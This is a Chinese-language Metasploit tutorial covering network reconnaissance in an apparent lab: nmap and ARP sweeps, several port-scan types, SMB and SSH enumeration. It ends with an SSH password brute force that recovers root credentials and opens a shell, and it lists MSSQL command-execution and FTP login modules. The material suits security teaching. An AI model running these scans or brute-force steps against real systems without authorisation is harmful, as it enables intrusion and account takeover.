正式开始步骤:一、信息收集
- 信息收集除开域名收集,社会工程学收集这几种方式外,光网络发现类信息收集:我个人遵守着OSI七层网络模型标准从二层至七层由下至上的信息收集策略。
- 使用auxiliary辅助功能模块来实现服务发现信息收集的目的。auxiliary/sacnner 中包含有多种服务软件端口扫描。
- 原理:向端口发送一些包,通过这些包回应的特征和信息来识别版本等操作,但是并不会直接发送payload去目标执行,从而产生不可逆的操作。
- nmap扫描
msf5 > db_nmap -A 192.168.1.126
[*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2020-02-11 14:31 CST
[*] Nmap: Nmap scan report for 192.168.1.126
[*] Nmap: Host is up (0.000096s latency).
[*] Nmap: Not shown: 990 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu4 (Ubuntu Linux; protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: | 1024 ea:83:1e:45:5a:a6:8c:43:1c:3c:e3:18:dd:fc:88:a5 (DSA)
[*] Nmap: |_ 2048 3a:94:d8:3f:e0:a2:7a:b8:c3:94:d7:5e:00:55:0c:a7 (RSA)
[*] Nmap: 80/tcp open http Apache httpd 2.2.14 ((Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL...)
[*] Nmap: | http-methods:
[*] Nmap: |_ Potentially risky methods: TRACE
[*] Nmap: |_http-server-header: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
[*] Nmap: |_http-title: owaspbwa OWASP Broken Web Applications
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 143/tcp open imap Courier Imapd (released 2008)
[*] Nmap: |_imap-capabilities: SORT completed CAPABILITY OK THREAD=ORDEREDSUBJECT ACL2=UNIONA0001 IMAP4rev1 THREAD=REFERENCES UIDPLUS CHILDREN IDLE NAMESPACE ACL QUOTA
[*] Nmap: 443/tcp open ssl/http Apache httpd 2.2.14 ((Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL...)
[*] Nmap: | http-methods:
[*] Nmap: |_ Potentially risky methods: TRACE
[*] Nmap: |_http-server-header: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
[*] Nmap: |_http-title: owaspbwa OWASP Broken Web Applications
[*] Nmap: | ssl-cert: Subject: commonName=owaspbwa
[*] Nmap: | Not valid before: 2013-01-02T21:12:38
[*] Nmap: |_Not valid after: 2022-12-31T21:12:38
[*] Nmap: |_ssl-date: 2020-02-11T06:32:06+00:00; 0s from scanner time.
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 3306/tcp open mysql MySQL 5.1.41-3ubuntu12.6-log
[*] Nmap: |_mysql-info: ERROR: Script execution failed (use -d to debug)
[*] Nmap: 5001/tcp open java-rmi Java RMI
[*] Nmap: 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
[*] Nmap: |_http-server-header: Apache-Coyote/1.1
[*] Nmap: |_http-title: Site doesn't have a title.
[*] Nmap: 8081/tcp open http Jetty 6.1.25
[*] Nmap: | http-methods:
[*] Nmap: |_ Potentially risky methods: TRACE
[*] Nmap: |_http-server-header: Jetty(6.1.25)
[*] Nmap: |_http-title: Choose Your Path
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[*] Nmap: SF-Port5001-TCP:V=7.60%I=7%D=2/11%Time=5E424A60%P=x86_64-pc-linux-gnu%r(NU
[*] Nmap: SF:LL,4,"\xac\xed\0\x05");
[*] Nmap: Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Host script results:
[*] Nmap: | smb-security-mode:
[*] Nmap: | account_used: guest
[*] Nmap: | authentication_level: user
[*] Nmap: | challenge_response: supported
[*] Nmap: |_ message_signing: disabled (dangerous, but default)
[*] Nmap: |_smb2-time: Protocol negotiation failed (SMB2)
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 32.20 seconds
msf5 > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.1.126 Linux server
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.1.126 22 tcp ssh open OpenSSH 5.3p1 Debian 3ubuntu4 Ubuntu Linux; protocol 2.0
192.168.1.126 80 tcp http open Apache httpd 2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
192.168.1.126 139 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.1.126 143 tcp imap open Courier Imapd released 2008
192.168.1.126 443 tcp ssl/http open Apache httpd 2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
192.168.1.126 445 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.1.126 3306 tcp mysql open MySQL 5.1.41-3ubuntu12.6-log
192.168.1.126 5001 tcp java-rmi open Java RMI
192.168.1.126 8080 tcp http open Apache Tomcat/Coyote JSP engine 1.1
192.168.1.126 8081 tcp http open Jetty 6.1.25
- Auxiliary 扫描:
- RHOSTS:
- 192.168.1.1-192.168.1.224 、 192.168.1.0/24 可以指定明确主机IP范围,可以指定IP段范围
- file:/root/host.txt 同时也支持文件形式的主机列表
- 网络层网络扫描: arp属于2.5层在网络层和数据链路层之间工作,我暂时将其放入网络层来做流程 search arp(arp是以广播的形式向本地网段发送arp数据包)
- auxiliary/scanner/discovery/arp_sweep: 使用arp请求枚举本地网络中存活的主机
- Enumerate alive Hosts in local network using ARP requests.
- auxiliary/scanner/discovery/arp_sweep: 使用arp请求枚举本地网络中存活的主机
- RHOSTS:
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SHOST no Source IP Address
SMAC no Source MAC Address
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 5 yes The number of seconds to wait for new data
# 其中必要的参数: RHOSTS目标主机,非必要:SHOST源IP,SMAC源MAC,不要问我为什么没有端口设置,如果有此问题的就不需要往下面看了。
# THREADS 线程数,TIMEOUT超时时间, 我是虚拟机使用的是网桥模式所以需要把网卡名指定下
msf5 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf5 auxiliary(scanner/discovery/arp_sweep) > set INTERFACE vbr0
INTERFACE => vbr0
msf5 auxiliary(scanner/discovery/arp_sweep) > run
[+] 192.168.1.2 appears to be up (Realtek (UpTech? also reported)).
[+] 192.168.1.126 appears to be up (Realtek (UpTech? also reported)).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/discovery/arp_sweep) > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.1.2 52:54:00:9c:b6:8b
192.168.1.126 52:54:00:05:63:1f
# 信息收集结果: 网络中存活着两台主机IP,和mac地址信息已经获取。
-
auxiliary/scanner/discovery/ipv6_neighbor: 枚举本地使用IPv6协议的的主机
- Enumerate local IPv6 hosts which respond to Neighbor Solicitations with a link-local address. Note, that like ARP scanning, this usually cannot be performed beyond the local broadcast network.
-
网络层扫描之IPID idle扫描: 基于seq消息序列号初始后返回+1的规则进行扫描。
-
查找ipidseq主机: auxiliary/scanner/ip/ipidseq
-
nmap -PN -sl id主机 需要扫描的主机。
-
传输层TCP端口扫描: search portscan 推荐使用auxiliary/scanner/portscan/tcp
- auxiliary/scanner/portscan/ack: 通过向设置的目标IP的端口范围以TCP传输协议的方式发送标志位为ACK的形式看目标主机端口是否开放。
-
Module options (auxiliary/scanner/portscan/ack):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
DELAY 0 yes The delay between connections, per thread, in milliseconds
INTERFACE no The name of the interface
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 192.168.1.126 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 500 yes The reply read timeout in milliseconds
msf5 auxiliary(scanner/portscan/ack) > set INTERFACE vbr
INTERFACE => vbr
msf5 auxiliary(scanner/portscan/ack) > set SNAPLEN 4000
SNAPLEN => 4000
msf5 auxiliary(scanner/portscan/ack) > set THREADS 200
THREADS => 200
msf5 auxiliary(scanner/portscan/ack) > run
- auxiliary/scanner/portscan/syn: 向服务器发送TCP标志位为S的包,看服务器是否返回S,返回S则不存在,存在则返回SYN+ACK
msf5 auxiliary(scanner/portscan/syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
DELAY 0 yes The delay between connections, per thread, in milliseconds
INTERFACE vbr no The name of the interface
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 192.168.1.126 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 500 yes The reply read timeout in milliseconds
msf5 auxiliary(scanner/portscan/syn) > set THREADS 8
THREADS => 8
msf5 auxiliary(scanner/portscan/syn) > set TIMEOUT 100
TIMEOUT => 100
msf5 auxiliary(scanner/portscan/syn) > run
[+] TCP OPEN 192.168.1.126:22
[+] TCP OPEN 192.168.1.126:80
[+] TCP OPEN 192.168.1.126:139
[+] TCP OPEN 192.168.1.126:143
[+] TCP OPEN 192.168.1.126:443
[+] TCP OPEN 192.168.1.126:445
[+] TCP OPEN 192.168.1.126:3306
- auxiliary/scanner/portscan/tcp: 用法差不多,但是速度很快,推荐使用这个扫描端口速度快很多,本人实测,待我抓包看看原理
- 它也是基于TCP三次握手中的第一次发送SYN,服务器回应SYN+ACK来确定端口开放的,而且速度很快,比其他几种方式快多了,我线程数设置的是一样的,但是就是这个速度更加快速。
msf5 auxiliary(scanner/portscan/tcp) > set THREADS 128
THREADS => 128
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.126
RHOSTS => 192.168.1.126
msf5 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.1.126: - 192.168.1.126:22 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:80 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:139 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:143 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:445 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:443 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:3306 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:5001 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:8080 - TCP OPEN
[+] 192.168.1.126: - 192.168.1.126:8081 - TCP OPEN
[*] 192.168.1.126: - Scanned 1 of 1 hosts (100% complete)
- auxiliary/scanner/portscan/xmas: 这里说的是发送FIN、PSH、URG标志位来识别。
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
DELAY 0 yes The delay between connections, per thread, in milliseconds
INTERFACE no The name of the interface
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 500 yes The reply read timeout in milliseconds
Description:
Enumerate open|filtered TCP services using a raw "XMas" scan; this
sends probes containing the FIN, PSH and URG flags.
msf5 auxiliary(scanner/portscan/xmas) > set INTERFACE vbr
INTERFACE => vbr
msf5 auxiliary(scanner/portscan/xmas) > set RHOSTS 192.168.1.126
RHOSTS => 192.168.1.126
msf5 auxiliary(scanner/portscan/xmas) > set THREADS 128
THREADS => 128
msf5 auxiliary(scanner/portscan/xmas) > run
- 传输层UDP端口扫描:
- auxiliary/scanner/discovery/udp_sweep:
Module options (auxiliary/scanner/discovery/udp_sweep):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
THREADS 10 yes The number of concurrent threads
msf5 auxiliary(scanner/discovery/udp_sweep) > set THREADS 128
THREADS => 128
msf5 auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 192.168.1.126
RHOSTS => 192.168.1.126
msf5 auxiliary(scanner/discovery/udp_sweep) > run
[*] Sending 13 probes to 192.168.1.126->192.168.1.126 (1 hosts)
[*] Scanned 1 of 1 hosts (100% complete)
-
auxiliary/scanner/discovery/udp_probe: 两个用法差不多具体看option参数.
-
五层信息收集:
- smb扫描: auxiliary/scanner/smb/
- 版本扫描: auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.126, 192.168.1.2 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.1.126:445 - Host could not be identified: Unix (Samba 3.4.7)
[*] Scanned 1 of 2 hosts (50% complete)
[+] 192.168.1.2:445 - Host is running Windows 2008 R2 Enterprise SP1 (build:7601) (name:WIN-DR8RRLPJVVF) (workgroup:WORKGROUP ) (signatures:optional)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
- 扫描命名管道判断SMB服务类型 auxiliary/scanner/smb/pipe_auditor
msf5 auxiliary(scanner/smb/pipe_auditor) > options
Module options (auxiliary/scanner/smb/pipe_auditor):
Name Current Setting Required Description
---- --------------- -------- -----------
NAMED_PIPES /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 192.168.1.2 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 192.168.1.144
RHOSTS => 192.168.1.144
msf5 auxiliary(scanner/smb/pipe_auditor) > run
[+] 192.168.1.144:139 - Pipes: \browser
[*] 192.168.1.144: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
- 扫描通过SMB管道可以访问的RCERPC服务 scanner/smb/pipe_dcerpc_auditor
Module options (auxiliary/scanner/smb/pipe_dcerpc_auditor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBDomain . no The Windows domain to use for authentication
SMBPIPE BROWSER yes The pipe name to use (BROWSER)
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/smb/pipe_dcerpc_auditor) > set RHOSTS 192.168.1.144
RHOSTS => 192.168.1.144
msf5 auxiliary(scanner/smb/pipe_dcerpc_auditor) > run
UUID 00000131-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 00000134-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 00000143-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 000001a0-0000-0000-c000-000000000046 0.0 OPEN VIA BROWSER
UUID 06bba54a-be05-49f9-b0a0-30f790261023 1.0 OPEN VIA BROWSER
UUID 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53 1.0 OPEN VIA BROWSER
UUID 0d72a7d4-6148-11d1-b4aa-00c04fb66ea0 1.0 OPEN VIA BROWSER
UUID 12b81e99-f207-4a4c-85d3-77b42f76fd14 1.0 OPEN VIA BROWSER
UUID 18f70770-8e64-11cf-9af1-0020af6e72f4 0.0 OPEN VIA BROWSER
UUID 1ff70682-0a51-30e8-076d-740be8cee98b 1.0 OPEN VIA BROWSER
UUID 300f3532-38cc-11d0-a3f0-0020af6b0add 1.2 OPEN VIA BROWSER
UUID 378e52b0-c0a9-11cf-822d-00aa0051e40f 1.0 OPEN VIA BROWSER
UUID 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 1.0 OPEN VIA BROWSER
UUID 3f77b086-3a17-11d3-9166-00c04f688e28 1.0 OPEN VIA BROWSER
UUID 3faf4738-3a21-4307-b46c-fdda9bb8c0d5 1.0 OPEN VIA BROWSER
UUID 3faf4738-3a21-4307-b46c-fdda9bb8c0d5 1.1 OPEN VIA BROWSER
UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188 3.0 OPEN VIA BROWSER
UUID 621dff68-3c39-4c6c-aae3-e68e2c6503ad 1.0 OPEN VIA BROWSER
UUID 629b9f66-556c-11d1-8dd2-00aa004abd5e 3.0 OPEN VIA BROWSER
UUID 63fbe424-2029-11d1-8db8-00aa004abd5e 1.0 OPEN VIA BROWSER
UUID 6bffd098-a112-3610-9833-012892020162 0.0 OPEN VIA BROWSER
UUID 6bffd098-a112-3610-9833-46c3f87e345a 1.0 OPEN VIA BROWSER
UUID 8d0ffe72-d252-11d0-bf8f-00c04fd9126b 1.0 OPEN VIA BROWSER
UUID 8fb6d884-2388-11d0-8c35-00c04fda2795 4.1 OPEN VIA BROWSER
UUID afa8bd80-7d8a-11c9-bef4-08002b102989 1.0 OPEN VIA BROWSER
UUID f50aac00-c7f3-428e-a022-a6b71bfb9d43 1.0 OPEN VIA BROWSER
[*] 192.168.1.144: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
-
SMB枚举共享auxiliary/scanner/smb/smb_enumshares
-
SMB枚举用户auxiliary/scanner/smb/smb_enumusers
-
SMB枚举域auxiliary/scanner/smb/smb_enumusers_domain
-
SSH服务扫描版本: auxiliary/scanner/ssh/ssh_version 1 ,1.9有漏洞
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 30 yes Timeout for the SSH probe
Description:
Detect SSH Version.
References:
http://en.wikipedia.org/wiki/SecureShell
msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.126
RHOSTS => 192.168.1.126
msf5 auxiliary(scanner/ssh/ssh_version) > set THREADS 16
THREADS => 16
msf5 auxiliary(scanner/ssh/ssh_version) > run
[+] 192.168.1.126:22 - SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4 ( service.version=5.3p1 openssh.comment=Debian-3ubuntu4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:5.3p1 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=10.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:10.04 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.1.126:22 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.251
RHOSTS => 192.168.1.251
msf5 auxiliary(scanner/ssh/ssh_version) > run
[+] 192.168.1.251:22 - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.4 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.1.251:22 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_version) >
- SSH密码爆破: auxiliary/scanner/ssh/ssh_login 基于密码字典\ auxiliary/scanner/ssh/ssh_login_pubkey 基于秘钥库 美杜莎\海德瑞这些ssh密码暴力破解也不错,能否破解主要还是要看密码文件的大小.
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.251
RHOSTS => 192.168.1.251
msf5 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE '/opt/metasploit-framework/embedded/framework/data/wordlists/root_userpass.txt'
USERPASS_FILE => /opt/metasploit-framework/embedded/framework/data/wordlists/root_userpass.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set THREADS 16
THREADS => 16
msf5 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
VERBOSE => true
msf5 auxiliary(scanner/ssh/ssh_login) > run
[-] 192.168.1.251:22 - Failed: 'root:'
[-] 192.168.1.251:22 - Failed: 'root:!root'
[-] 192.168.1.251:22 - Failed: 'root:Cisco'
[-] 192.168.1.251:22 - Failed: 'root:NeXT'
..............[太多手工省略]................
[-] 192.168.1.251:22 - Failed: 'root:letmein'
[-] 192.168.1.251:22 - Failed: 'root:powerapp'
[-] 192.168.1.251:22 - Failed: 'root:dbps'
[-] 192.168.1.251:22 - Failed: 'root:ibm'
[-] 192.168.1.251:22 - Failed: 'root:monitor'
[-] 192.168.1.251:22 - Failed: 'root:turnkey'
[-] 192.168.1.251:22 - Failed: 'root:vagrant'
[+] 192.168.1.251:22 - Success: 'root:a' ''
[*] Command shell session 1 opened (192.168.1.254:32825 -> 192.168.1.251:22) at 2020-02-11 17:54:22 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
- 收集Windows缺少的补丁
- 基于已经取得的Session进行检测.
- post/windows/gather/enum_patches
- MSSQL TCP:1433(动态端口) / UDP 1434(查询TCP端口号)
- 服务检测:auxiliary/scanner/mssql/mssql_ping
- 密码爆破:auxiliary/scanner/mssql/mssql_login
- 执行远程代码:auxiliary/admin/mssql/mssql_exec
- FTP扫描
- auxiliary/scanner/ftp/ftp_version
- auxiliary/scanner/ftp/ftp_login
- auxiliary/scanner/ftp/anonymous
